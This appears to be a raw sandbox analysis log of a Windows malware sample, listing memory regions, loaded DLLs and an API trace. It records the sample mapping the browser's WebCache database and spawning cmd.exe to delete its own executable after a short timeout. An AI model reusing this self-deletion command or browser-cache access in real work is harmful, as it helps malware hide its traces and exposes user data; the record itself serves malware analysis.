monitored = 0 entry_point = 0x7ffb29b66d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 799 start_va = 0x7ffb29ba0000 end_va = 0x7ffb2a1e3fff monitored = 0 entry_point = 0x7ffb29d664b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 800 start_va = 0x7ffb2a1f0000 end_va = 0x7ffb2a3d7fff monitored = 0 entry_point = 0x7ffb2a21ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 801 start_va = 0x7ffb2a490000 end_va = 0x7ffb2a544fff monitored = 0 entry_point = 0x7ffb2a4d22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 802 start_va = 0x7ffb2a550000 end_va = 0x7ffb2a592fff monitored = 0 entry_point = 0x7ffb2a564b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 803 start_va = 0x7ffb2a5c0000 end_va = 0x7ffb2a611fff monitored = 0 entry_point = 0x7ffb2a5cf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 804 start_va = 0x7ffb2a780000 end_va = 0x7ffb2a905fff monitored = 0 entry_point = 0x7ffb2a7cffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 805 start_va = 0x7ffb2a910000 end_va = 0x7ffb2a9bcfff monitored = 0 entry_point = 0x7ffb2a9281a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 806 start_va = 0x7ffb2aaa0000 end_va = 0x7ffb2abf5fff monitored = 0 entry_point = 0x7ffb2aaaa8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 807 start_va = 0x7ffb2ac00000 end_va = 0x7ffb2ac3afff monitored = 0 entry_point = 0x7ffb2ac012f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 808 start_va = 0x7ffb2b1d0000 end_va = 0x7ffb2b44cfff monitored = 0 entry_point = 0x7ffb2b2a4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 809 start_va = 0x7ffb2b560000 end_va = 0x7ffb2b620fff monitored = 0 entry_point = 0x7ffb2b580da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 810 start_va = 0x7ffb2b630000 end_va = 0x7ffb2b6d6fff monitored = 0 entry_point = 0x7ffb2b63b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 811 start_va = 0x7ffb2b6f0000 end_va = 0x7ffb2b796fff monitored = 0 entry_point = 0x7ffb2b7058d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 812 start_va = 0x7ffb2b7a0000 end_va = 0x7ffb2ccfefff monitored = 0 entry_point = 0x7ffb2b9011f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 813 start_va = 0x7ffb2cd00000 end_va = 0x7ffb2cd9cfff monitored = 0 entry_point = 0x7ffb2cd078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 814 start_va = 0x7ffb2ce20000 end_va = 0x7ffb2cf3bfff monitored = 0 entry_point = 0x7ffb2ce602b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 815 start_va = 0x7ffb2cfb0000 end_va = 0x7ffb2d00afff monitored = 0 entry_point = 0x7ffb2cfc38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 816 start_va = 0x7ffb2d1c0000 end_va = 0x7ffb2d380fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 823 start_va = 0x960000 end_va = 0x960fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 824 start_va = 0x960000 end_va = 0x960fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 825 start_va = 0x960000 end_va = 0x960fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 829 start_va = 0x960000 end_va = 0x967fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 886 start_va = 0x960000 end_va = 0x960fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 1065 start_va = 0x960000 end_va = 0x960fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 1066 start_va = 0x980000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 1067 start_va = 0x960000 end_va = 0x967fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 1068 start_va = 0x980000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 1069 start_va = 0x960000 end_va = 0x96ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1070 start_va = 0x990000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1071 start_va = 0x980000 end_va = 0x980fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 1072 start_va = 0x980000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 1073 start_va = 0x9a0000 end_va = 0x9a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 1074 start_va = 0x9b0000 end_va = 0x9b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 1075 start_va = 0x9c0000 end_va = 0x9c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 1076 start_va = 0x980000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1077 start_va = 0x9d0000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1078 start_va = 0x9a0000 end_va = 0x9affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1079 start_va = 0x9e0000 end_va = 0x9effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1080 start_va = 0x9b0000 end_va = 0x9b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 1081 start_va = 0x3900000 end_va = 0x3900fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 1082 start_va = 0x3910000 end_va = 0x3917fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003910000" filename = "" Region: id = 1083 start_va = 0x3900000 end_va = 0x3907fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 1084 start_va = 0x9b0000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1085 start_va = 0x9c0000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1086 start_va = 0x3900000 end_va = 0x3900fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 1087 start_va = 0x3910000 end_va = 0x391ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Thread: id = 13 os_tid = 0x12b4 Thread: id = 14 os_tid = 0xd40 Thread: id = 15 os_tid = 0xd34 Thread: id = 16 os_tid = 0xae4 Thread: id = 17 os_tid = 0xbd0 Thread: id = 18 os_tid = 0xbc8 Thread: id = 19 os_tid = 0xb84 Process: id = "4" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x511dc000" os_pid = "0xd20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x148" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c timeout /t 5 & del /f /q \"C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\" & exit" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f024" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 890 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 891 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 892 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 893 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 894 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 895 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 896 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 897 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 898 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 899 start_va = 0x9b0000 end_va = 0xa01fff monitored = 1 entry_point = 0x9c4fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 900 start_va = 0xa10000 end_va = 0x4a0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 901 start_va = 0x77110000 end_va = 0x7728afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 902 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 903 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 904 start_va = 0x7fff0000 end_va = 0x7dfb2d1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 905 start_va = 0x7dfb2d1c0000 end_va = 0x7ffb2d1bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfb2d1c0000" filename = "" Region: id = 906 start_va = 0x7ffb2d1c0000 end_va = 0x7ffb2d380fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 907 start_va = 0x7ffb2d381000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb2d381000" filename = "" Region: id = 910 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 911 start_va = 0x5a1e0000 end_va = 0x5a22ffff monitored = 0 entry_point = 0x5a1f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 912 start_va = 0x5a240000 end_va = 0x5a2b9fff monitored = 0 entry_point = 0x5a253290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 913 start_va = 0x74610000 end_va = 0x746effff monitored = 0 entry_point = 0x74623980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 914 start_va = 0x5a230000 end_va = 0x5a237fff monitored = 0 entry_point = 0x5a2317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 915 start_va = 0x5f0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 916 start_va = 0x74610000 end_va = 0x746effff monitored = 0 entry_point = 0x74623980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 917 start_va = 0x75710000 end_va = 0x7588dfff monitored = 0 entry_point = 0x757c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 918 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 919 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 999 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1000 start_va = 0x75a40000 end_va = 0x75afdfff monitored = 0 entry_point = 0x75a75630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1001 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1002 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1003 start_va = 0x7b0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 1004 start_va = 0x4a10000 end_va = 0x4baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a10000" filename = "" Region: id = 1005 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1006 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1007 start_va = 0x4bb0000 end_va = 0x4ee6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1063 start_va = 0x1d0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cmd.exe.mui") Region: id = 1064 start_va = 0x500000 end_va = 0x5dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Thread: id = 26 os_tid = 0x1368 [0237.988] GetProcAddress (hModule=0x74610000, lpProcName="SetConsoleInputExeNameW") returned 0x7582b440 [0237.988] GetProcessHeap () returned 0x7b0000 [0237.988] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x400a) returned 0x7bb778 [0237.988] GetProcessHeap () returned 0x7b0000 [0237.988] RtlFreeHeap (HeapHandle=0x7b0000, Flags=0x0, BaseAddress=0x7bb778) returned 1 [0237.989] _wcsicmp (_String1="timeout", _String2=")") returned 75 [0237.989] _wcsicmp (_String1="FOR", _String2="timeout") returned -14 [0237.989] _wcsicmp (_String1="FOR/?", _String2="timeout") returned -14 [0237.989] _wcsicmp (_String1="IF", _String2="timeout") returned -11 [0237.989] _wcsicmp (_String1="IF/?", _String2="timeout") returned -11 [0237.989] _wcsicmp (_String1="REM", _String2="timeout") returned -2 [0237.990] _wcsicmp (_String1="REM/?", _String2="timeout") returned -2 [0237.990] GetProcessHeap () returned 0x7b0000 [0237.990] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x58) returned 0x7b74a8 [0237.990] GetProcessHeap () returned 0x7b0000 [0237.990] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x18) returned 0x7b7a30 [0237.990] GetProcessHeap () returned 0x7b0000 [0237.990] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x16) returned 0x7b7970 [0237.991] GetProcessHeap () returned 0x7b0000 [0237.991] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x58) returned 0x7b7508 [0237.991] _wcsicmp (_String1="del", _String2=")") returned 59 [0237.991] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0237.991] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0237.991] _wcsicmp (_String1="IF", _String2="del") returned 5 [0237.991] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0237.991] _wcsicmp (_String1="REM", _String2="del") returned 14 [0237.991] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0237.991] GetProcessHeap () returned 0x7b0000 [0237.991] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x58) returned 0x7b9110 [0237.991] GetProcessHeap () returned 0x7b0000 [0237.992] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x10) returned 0x7b9170 [0237.996] GetProcessHeap () returned 0x7b0000 [0237.996] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xe2) returned 0x7b9188 [0237.997] GetProcessHeap () returned 0x7b0000 [0237.997] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x58) returned 0x7b9278 [0237.997] _wcsicmp (_String1="exit", _String2=")") returned 60 [0237.997] _wcsicmp (_String1="FOR", _String2="exit") returned 1 [0237.997] _wcsicmp (_String1="FOR/?", _String2="exit") returned 1 [0237.997] _wcsicmp (_String1="IF", _String2="exit") returned 4 [0237.997] _wcsicmp (_String1="IF/?", _String2="exit") returned 4 [0237.997] _wcsicmp (_String1="REM", _String2="exit") returned 13 [0237.997] _wcsicmp (_String1="REM/?", _String2="exit") returned 13 [0237.997] GetProcessHeap () returned 0x7b0000 [0237.997] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x58) returned 0x7b92d8 [0237.997] GetProcessHeap () returned 0x7b0000 [0237.997] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x12) returned 0x7b7c30 [0237.998] GetConsoleTitleW (in: lpConsoleTitle=0x19fa10, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0238.089] _wcsicmp (_String1="timeout", _String2="DIR") returned 16 [0238.089] _wcsicmp (_String1="timeout", _String2="ERASE") returned 15 [0238.089] _wcsicmp (_String1="timeout", _String2="DEL") returned 16 [0238.089] _wcsicmp (_String1="timeout", _String2="TYPE") returned -16 [0238.089] _wcsicmp (_String1="timeout", _String2="COPY") returned 17 [0238.089] _wcsicmp (_String1="timeout", _String2="CD") returned 17 [0238.089] _wcsicmp (_String1="timeout", _String2="CHDIR") returned 17 [0238.089] _wcsicmp (_String1="timeout", _String2="RENAME") returned 2 [0238.089] _wcsicmp (_String1="timeout", _String2="REN") returned 2 [0238.089] _wcsicmp (_String1="timeout", _String2="ECHO") returned 15 [0238.089] _wcsicmp (_String1="timeout", _String2="SET") returned 1 [0238.089] _wcsicmp (_String1="timeout", _String2="PAUSE") returned 4 [0238.089] _wcsicmp (_String1="timeout", _String2="DATE") returned 16 [0238.089] _wcsicmp (_String1="timeout", _String2="TIME") returned 111 [0238.089] _wcsicmp (_String1="timeout", _String2="PROMPT") returned 4 [0238.089] _wcsicmp (_String1="timeout", _String2="MD") returned 7 [0238.089] _wcsicmp (_String1="timeout", _String2="MKDIR") returned 7 [0238.089] _wcsicmp (_String1="timeout", _String2="RD") returned 2 [0238.089] _wcsicmp (_String1="timeout", _String2="RMDIR") returned 2 [0238.089] _wcsicmp (_String1="timeout", _String2="PATH") returned 4 [0238.090] _wcsicmp (_String1="timeout", _String2="GOTO") returned 13 [0238.090] _wcsicmp (_String1="timeout", _String2="SHIFT") returned 1 [0238.090] _wcsicmp (_String1="timeout", _String2="CLS") returned 17 [0238.090] _wcsicmp (_String1="timeout", _String2="CALL") returned 17 [0238.090] _wcsicmp (_String1="timeout", _String2="VERIFY") returned -2 [0238.090] _wcsicmp (_String1="timeout", _String2="VER") returned -2 [0238.090] _wcsicmp (_String1="timeout", _String2="VOL") returned -2 [0238.090] _wcsicmp (_String1="timeout", _String2="EXIT") returned 15 [0238.090] _wcsicmp (_String1="timeout", _String2="SETLOCAL") returned 1 [0238.090] _wcsicmp (_String1="timeout", _String2="ENDLOCAL") returned 15 [0238.090] _wcsicmp (_String1="timeout", _String2="TITLE") returned -7 [0238.090] _wcsicmp (_String1="timeout", _String2="START") returned 1 [0238.090] _wcsicmp (_String1="timeout", _String2="DPATH") returned 16 [0238.090] _wcsicmp (_String1="timeout", _String2="KEYS") returned 9 [0238.090] _wcsicmp (_String1="timeout", _String2="MOVE") returned 7 [0238.090] _wcsicmp (_String1="timeout", _String2="PUSHD") returned 4 [0238.090] _wcsicmp (_String1="timeout", _String2="POPD") returned 4 [0238.090] _wcsicmp (_String1="timeout", _String2="ASSOC") returned 19 [0238.090] _wcsicmp (_String1="timeout", _String2="FTYPE") returned 14 [0238.090] _wcsicmp (_String1="timeout", _String2="BREAK") returned 18 [0238.090] _wcsicmp (_String1="timeout", _String2="COLOR") returned 17 [0238.091] _wcsicmp (_String1="timeout", _String2="MKLINK") returned 7 [0238.091] _wcsicmp (_String1="timeout", _String2="DIR") returned 16 [0238.091] _wcsicmp (_String1="timeout", _String2="ERASE") returned 15 [0238.091] _wcsicmp (_String1="timeout", _String2="DEL") returned 16 [0238.091] _wcsicmp (_String1="timeout", _String2="TYPE") returned -16 [0238.091] _wcsicmp (_String1="timeout", _String2="COPY") returned 17 [0238.091] _wcsicmp (_String1="timeout", _String2="CD") returned 17 [0238.091] _wcsicmp (_String1="timeout", _String2="CHDIR") returned 17 [0238.091] _wcsicmp (_String1="timeout", _String2="RENAME") returned 2 [0238.091] _wcsicmp (_String1="timeout", _String2="REN") returned 2 [0238.091] _wcsicmp (_String1="timeout", _String2="ECHO") returned 15 [0238.091] _wcsicmp (_String1="timeout", _String2="SET") returned 1 [0238.091] _wcsicmp (_String1="timeout", _String2="PAUSE") returned 4 [0238.091] _wcsicmp (_String1="timeout", _String2="DATE") returned 16 [0238.091] _wcsicmp (_String1="timeout", _String2="TIME") returned 111 [0238.091] _wcsicmp (_String1="timeout", _String2="PROMPT") returned 4 [0238.091] _wcsicmp (_String1="timeout", _String2="MD") returned 7 [0238.091] _wcsicmp (_String1="timeout", _String2="MKDIR") returned 7 [0238.091] _wcsicmp (_String1="timeout", _String2="RD") returned 2 [0238.091] _wcsicmp (_String1="timeout", _String2="RMDIR") returned 2 [0238.091] _wcsicmp (_String1="timeout", _String2="PATH") returned 4 [0238.092] _wcsicmp (_String1="timeout", _String2="GOTO") returned 13 [0238.092] _wcsicmp (_String1="timeout", _String2="SHIFT") returned 1 [0238.092] _wcsicmp (_String1="timeout", _String2="CLS") returned 17 [0238.092] _wcsicmp (_String1="timeout", _String2="CALL") returned 17 [0238.092] _wcsicmp (_String1="timeout", _String2="VERIFY") returned -2 [0238.092] _wcsicmp (_String1="timeout", _String2="VER") returned -2 [0238.092] _wcsicmp (_String1="timeout", _String2="VOL") returned -2 [0238.092] _wcsicmp (_String1="timeout", _String2="EXIT") returned 15 [0238.092] _wcsicmp (_String1="timeout", _String2="SETLOCAL") returned 1 [0238.093] _wcsicmp (_String1="timeout", _String2="ENDLOCAL") returned 15 [0238.093] _wcsicmp (_String1="timeout", _String2="TITLE") returned -7 [0238.093] _wcsicmp (_String1="timeout", _String2="START") returned 1 [0238.093] _wcsicmp (_String1="timeout", _String2="DPATH") returned 16 [0238.093] _wcsicmp (_String1="timeout", _String2="KEYS") returned 9 [0238.093] _wcsicmp (_String1="timeout", _String2="MOVE") returned 7 [0238.093] _wcsicmp (_String1="timeout", _String2="PUSHD") returned 4 [0238.093] _wcsicmp (_String1="timeout", _String2="POPD") returned 4 [0238.093] _wcsicmp (_String1="timeout", _String2="ASSOC") returned 19 [0238.093] _wcsicmp (_String1="timeout", _String2="FTYPE") returned 14 [0238.093] _wcsicmp (_String1="timeout", _String2="BREAK") returned 18 [0238.093] _wcsicmp (_String1="timeout", _String2="COLOR") returned 17 [0238.093] _wcsicmp (_String1="timeout", _String2="MKLINK") returned 7 [0238.093] _wcsicmp (_String1="timeout", _String2="FOR") returned 14 [0238.093] 